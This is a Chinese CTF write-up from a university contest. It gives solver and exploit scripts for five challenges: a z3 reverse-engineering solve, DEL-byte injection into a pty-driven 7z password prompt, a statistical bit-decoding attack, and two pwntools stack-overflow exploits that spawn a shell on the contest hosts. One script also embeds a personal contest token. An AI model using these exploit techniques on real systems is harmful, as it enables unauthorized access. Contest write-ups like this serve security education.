高校运维2024
死掉了
babyre #
用 z3 的 32 位 BitVec 求解混合了位运算和算术的方程：x1 直接由两个常量相加得到，x2、x3、x4 各由一个方程约束（x3、x4 另加了取值上界以挑出“小”的解），解出的四个 32 位值拼成 flag。
from z3 import *
from Crypto.Util.number import long_to_bytes, bytes_to_long
from hashlib import md5
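# Recover the four 32-bit words of the flag.  x1 is a plain constant sum; x2..x4
# are each pinned by one mixed boolean/arithmetic equation that z3 solves over
# 32-bit bit-vectors (all arithmetic wraps mod 2**32, as in the target binary).
MASK32 = 0xFFFFFFFF


def _solve32(name, equation, *bounds):
    """Return the value of a fresh 32-bit BitVec `name` that satisfies `equation`.

    `equation` and each entry of `bounds` are callables mapping the symbolic
    BitVec to a z3 constraint.  A fresh Solver is used per unknown so the
    constraints of one equation never leak into the next, and an unsat
    system raises a clear RuntimeError instead of an opaque failure inside
    s.model().
    """
    x = BitVec(name, 32)
    s = Solver()
    s.add(equation(x))
    for bound in bounds:
        s.add(bound(x))
    if s.check() != sat:
        raise RuntimeError(f"no 32-bit solution for {name}")
    return s.model()[x].as_long()


# The binary adds these as 32-bit words; mask so an overflowing sum would wrap too.
x1 = (0xADB1D018 + 0x36145344) & MASK32

x2 = _solve32(
    'x',
    lambda x: (x | 0x8E03BEC3) - 3 * (x & 0x71FC413C) + x == 0x902C7FF8,
)

# NOTE: '<=' / '>' on z3 BitVecs are *signed* comparisons; the bounds below are
# meant as unsigned "small value" limits, so ULE/UGT are used explicitly.
x3 = _solve32(
    'x1',
    lambda x: (4 * ((~x & 0xA8453437) + 2 * ~(~x | 0xA8453437))
               + -3 * (~x | 0xA8453437)
               + 3 * ~(x | 0xA8453437)
               - (-10 * (x & 0xA8453437)
                  + (x ^ 0xA8453437))) == 551387557,
    lambda x: ULE(x, 0x10000000),
)

x4 = _solve32(
    'x2',
    lambda x: (11 * ~(x ^ 0xE33B67BD)
               + 4 * ~(~x | 0xE33B67BD)
               - (6 * (x & 0xE33B67BD)
                  + 12 * ~(x | 0xE33B67BD))
               + 3 * (x & 0xD2C7FC0C)
               + -5 * x
               - 2 * ~(x | 0xD2C7FC0C)
               + ~(x | 0x2D3803F3)
               + 4 * (x & 0x2D3803F3)
               - -2 * (x | 0x2D3803F3)) == 0xCE1066DC,
    lambda x: ULE(x, 0x10000000),
    lambda x: UGT(x, 0),
)

print(x1, x2, x3, x4)
# 3821413212 98124621 78769651 67321987
# flag{e3c6235c-05d9434d-04b1edf3-04034083}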
zip #
源码里的 write 是往 forkpty 的 master 端写数据，相当于在终端上“敲键盘”，而不是像 memcpy 那样把字节原样交给 7z：输入会先经过 pty 的行规程（canonical 模式）处理。
因此在 password 中放入控制字符就能模拟按键，进而篡改 7z 真正收到的密码：\x7f（DEL，tty 默认的 erase 字符）会像退格一样删掉前面已输入的字节。
这里先发 64 个 \x7f 删掉 password 开头的内容（推测为 token 的前 64 个字节），再跟上自己可控的 password（exp 中用 flag{），这样加密与解密所用的密码就都是已知的。
源码出问题的地方:
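/* Write all `len` bytes of `buf` to `fd`, retrying on short writes.
 * Returns 0 on success, -1 on a write error. */
static int write_all(int fd, const char *buf, size_t len) {
    while (len > 0) {
        ssize_t w = write(fd, buf, len);
        if (w < 0) return -1;
        buf += w;
        len -= (size_t)w;
    }
    return 0;
}

/*
 * Run `7z a flag.zip /tmp/flag.txt -mem=AES256 -p` in a child on a fresh
 * pseudo-terminal, echo its output to stdout, and type `password` (plus a
 * newline) every time the child's output contains "password".
 *
 * The password is written to the pty *master*, so the slave's line discipline
 * treats it exactly like keystrokes: in canonical mode bytes such as DEL
 * (0x7f, erase), ^U (kill) or ^C (interrupt) edit or abort the line instead
 * of becoming part of the password.  That is the flaw this page exploits, so
 * control bytes are rejected here before anything is typed.  `password` is a
 * NUL-terminated string and is not modified.
 */
void zip(char *password) {
    int master, pid;
    size_t plen = strlen(password);

    /* Anything below 0x20 or equal to DEL is tty editing input, not a password byte. */
    for (size_t i = 0; i < plen; i++) {
        unsigned char c = (unsigned char)password[i];
        if (c < 0x20 || c == 0x7f) {
            fprintf(stderr, "zip: password contains a control byte at offset %zu\n", i);
            return;
        }
    }

    pid = forkpty(&master, NULL, NULL, NULL);
    if (pid < 0) {
        perror("forkpty");
        return;
    }
    if (pid == 0) {
        char* argv[] = { "7z", "a", "flag.zip", "/tmp/flag.txt", "-mem=AES256", "-p", NULL };
        execve("/usr/bin/7z", argv, NULL);
        /* Only reached if execve failed: never fall through into the parent's code. */
        _exit(127);
    }

    char buffer[4097];
    while (true) {
        ssize_t n = read(master, buffer, 4096);
        /* n == 0 would otherwise spin forever; n < 0 (EIO) is the normal end on Linux ptys. */
        if (n <= 0) break;
        fflush(stdout);
        (void)write_all(1, buffer, (size_t)n);
        /* n <= 4096 leaves room for the terminator strstr needs. */
        buffer[n] = 0;
        if (strstr(buffer, "password")) {
            usleep(10000);
            if (write_all(master, password, plen) < 0 ||
                write_all(master, "\n", 1) < 0)
                break;
        }
    }
    wait(NULL);
    close(master);
}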
exp
from pwn import *
# Drive the `zip` service (local binary here; remote line kept for reference).
# The service types `password` into 7z through a pty, so DEL bytes (0x7f, the
# tty's default erase character) act as backspaces on the line: 64 of them
# wipe the 64-byte prefix and leave only the trailing "flag{" as the archive
# password.
token = b''
ERASE = b"\x7F"

# con = remote("prob03.contest.pku.edu.cn", 10003)
con = process('./zip')
con.sendlineafter(b"Please input your token: ", token)

# Password used for encryption: (presumably) the token prefix, erased, then a known value.
passwd_enc = b"".join([token[:64], ERASE * 64, b"flag{"])
con.sendlineafter(b"your token:\n", passwd_enc)

# Password used for decryption must equal whatever survived the erase above.
passwd_dec = b"flag{"
con.sendlineafter(b"your flag:\n", passwd_dec)
con.interactive()
secretbit #
由代码可知 instance(m, n) 返回 1 当且仅当随机置换的所有环长都 ≤ n-1，所以返回 1 的概率只由 (m, n) 决定；生成数据时每个 bit 决定实际采样的是 (m0, n0) 还是 (m1, n1)，且两对参数被刻意拉开，因此把观测到的 1 的个数与两组参数各自模拟出的个数比较，更接近哪一组就能恢复该 bit。
task
from secret import flag
from random import randrange, shuffle
from Crypto.Util.number import bytes_to_long
from tqdm import tqdm
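def instance(m, n):
    """Draw a random permutation of range(m) and test its cycle structure.

    Returns 1 if every cycle of the permutation has length at most n - 1
    (i.e. from any i, repeatedly following start[...] gets back to i within
    n - 1 steps), else 0.  P(1) therefore depends only on (m, n).

    Equivalent to walking up to n - 1 steps from every i as the original
    did, but each element is visited once, so the cost is O(m) rather than
    O(m * n); the random draw (one shuffle) is identical.
    """
    start = list(range(m))
    shuffle(start)
    seen = [False] * m
    for i in range(m):
        if seen[i]:
            continue
        # Measure the cycle containing i exactly once.
        length = 0
        now = i
        while not seen[now]:
            seen[now] = True
            now = start[now]
            length += 1
        if length > n - 1:
            return 0
    return 1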
def leak(m, n, times=2000):
    """Sample instance(m, n) `times` times and return the 0/1 results in draw order."""
    message = []
    for _ in range(times):
        message.append(instance(m, n))
    return message
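MAX_M = 400
MIN_M = 200

# Flag bits, most significant first.  bin() drops leading zeros, so the first
# byte contributes fewer than 8 bits; a decoder must re-pad from the left.
flag_b = [int(i) for i in bin(bytes_to_long(flag))[2:]]


def _draw_pair():
    """Pick two (m, n) parameter pairs that are far enough apart to be told apart.

    n is drawn in [m // 2, 8 * m // 9); the pairs are re-drawn until
    (m0 - n0) and (m1 - n1) differ by more than MAX_M // 5, which keeps
    P(instance == 1) clearly different for the two candidates.
    """
    while True:
        m0 = randrange(MIN_M, MAX_M)
        n0 = randrange(m0 // 2, m0 * 8 // 9)
        m1 = randrange(MIN_M, MAX_M)
        n1 = randrange(m1 // 2, m1 * 8 // 9)
        if abs(m0 - m1 - n0 + n1) > MAX_M // 5:
            return (m0, n0), (m1, n1)


leak_message = []
for bi in tqdm(flag_b):
    (m0, n0), (m1, n1) = _draw_pair()
    # The bit selects which pair is actually sampled; both candidates are recorded.
    choose_m, choose_n = (m0, n0) if bi == 0 else (m1, n1)
    leak_message.append([[m0, n0], [m1, n1], leak(choose_m, choose_n)])

# Close the file deterministically instead of relying on GC to flush the handle.
with open('data.txt', 'w') as f:
    f.write(str(leak_message))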
exp
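def instance(m, n):
    """Draw a random permutation of range(m) and test its cycle structure.

    Returns 1 if every cycle of the permutation has length at most n - 1
    (from any i, following start[...] returns to i within n - 1 steps),
    else 0.  Same random draw and same result as the task's version, but
    each element is visited once (O(m) instead of O(m * n)), which matters
    because the decoder calls this 4000 times per flag bit.
    """
    start = list(range(m))
    shuffle(start)
    seen = [False] * m
    for i in range(m):
        if seen[i]:
            continue
        # Measure the cycle containing i exactly once.
        length = 0
        now = i
        while not seen[now]:
            seen[now] = True
            now = start[now]
            length += 1
        if length > n - 1:
            return 0
    return 1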
# Decode each bit: the recorded sample was drawn with either (m0, n0) [bit 0]
# or (m1, n1) [bit 1].  Re-simulate both candidates with the same sample size
# (2000) and pick whichever count of 1s is closer to the observed count.
flag = []
for (m0, n0), (m1, n1), leak_msg in leak_message:
    observed = leak_msg.count(1)
    count0 = sum(instance(m0, n0) for _ in range(2000))
    count1 = sum(instance(m1, n1) for _ in range(2000))
    bit = 0 if abs(count0 - observed) < abs(count1 - observed) else 1
    flag.append(bit)
    print(flag)   # progress: bits recovered so far
print(flag)
# flag = [1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1]
# flag{this_1s_the_sEcret_f1ag}
babypwn #
password 存在栈溢出：缓冲区开头写入 "/bin/sh\x00"，再填充到 0x38 字节（8 + 6*8）覆盖到返回地址，把返回地址改为 0x401184（调用 system 的位置）。
由于 password 缓冲区本身被当作参数传给 system，字符串在 NUL 处截断，实际执行的就是 /bin/sh。
用a来padding
from pwn import *
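# Stack overflow in the password read: 0x38 bytes of data reach the saved
# return address, which is redirected to 0x401184 (the system() call site,
# per the writeup).  The buffer starts with a NUL-terminated "/bin/sh" so that
# the same buffer, handed to system(), is cut at the NUL and runs a shell.
RET_OFFSET = 0x38          # 8 bytes of "/bin/sh\0" + 6*8 bytes of filler
SYSTEM_CALL = 0x401184

# r = process('./pwn')
r = remote('prob07.contest.pku.edu.cn', 10007)
# All I/O as bytes: pwntools implicitly encodes str, but that path is
# deprecated and raises under `python -bb`.
r.sendlineafter(b"Please input your token: ", b'')
r.recvuntil(b"username: ")
r.sendline(b'helloworld')
r.recv()

cmd = b'/bin/sh\x00'
payload = cmd + b'a' * (RET_OFFSET - len(cmd)) + p64(SYSTEM_CALL)
assert len(payload) == RET_OFFSET + 8, "padding must end exactly at the return address"
r.sendline(payload)
r.interactive()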
login #
先用超长 password 让服务崩溃，再用 recvall 把 "Core dumped" 之后服务端输出的内容整段收下来保存为 tmp（推测即题目二进制，用于本地分析偏移和目标地址）。
from pwn import *
# 你可以 打开网页终端 或者通过命令 nc prob04.contest.pku.edu.cn 10004 连接到题目
# Crash the login service with an oversized password, then save everything it
# prints after "Core dumped" to ./tmp for local analysis.
p = remote('prob04.contest.pku.edu.cn', '10004')
token = b''
p.sendlineafter(b"Please input your token:", token)
# p.sendline()
p.sendlineafter(b"Username", b"hello world")
banner = p.recvuntil(b'Password: ')

overflow = b'a' * 0x40
p.sendline(overflow)
p.recvuntil(b'Core dumped\n')
print(banner)

# buf = p.recv(2048)
dump = p.recvall()
print(dump)
with open('tmp', 'wb') as out:
    out.write(dump)
栈溢出脚本
from pwn import *
# 你可以 打开网页终端 或者通过命令 nc prob04.contest.pku.edu.cn 10004 连接到题目
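# Overwrite the saved return address of the login routine: 0x98 bytes of
# padding reach it, and 0x40127E is the target (taken from the writeup,
# presumably the success path in the recovered binary).
# p = process('./tmp')    # local run -- kept commented out: previously this
#                         # was started and then immediately replaced by the
#                         # remote handle, leaking a running child process.
p = remote('prob04.contest.pku.edu.cn', '10004')

# NOTE(review): this is a per-user contest token; it should not be committed
# or published -- load it from the environment or a local file instead.
token = b'219:MEQCIChdqn_wNP2ro4YA5ncWPK0wu9qUpGS95zBgFOfy0fYKAiA4ygaWckU4T88c506D9gVi4SgHbPCG1ROlRSCogIRbdg=='
p.sendlineafter(b"Please input your token:", token)
# p.sendline()
p.sendlineafter(b"Username", b"hello world")
p.recvuntil(b'Password: ')

RET_OFFSET = 0x98
TARGET = 0x40127E
payload = b'a' * RET_OFFSET + p64(TARGET)
p.sendline(payload)
p.interactive()
# flag{loGIN_SUccESs_congrAtULaTIOn}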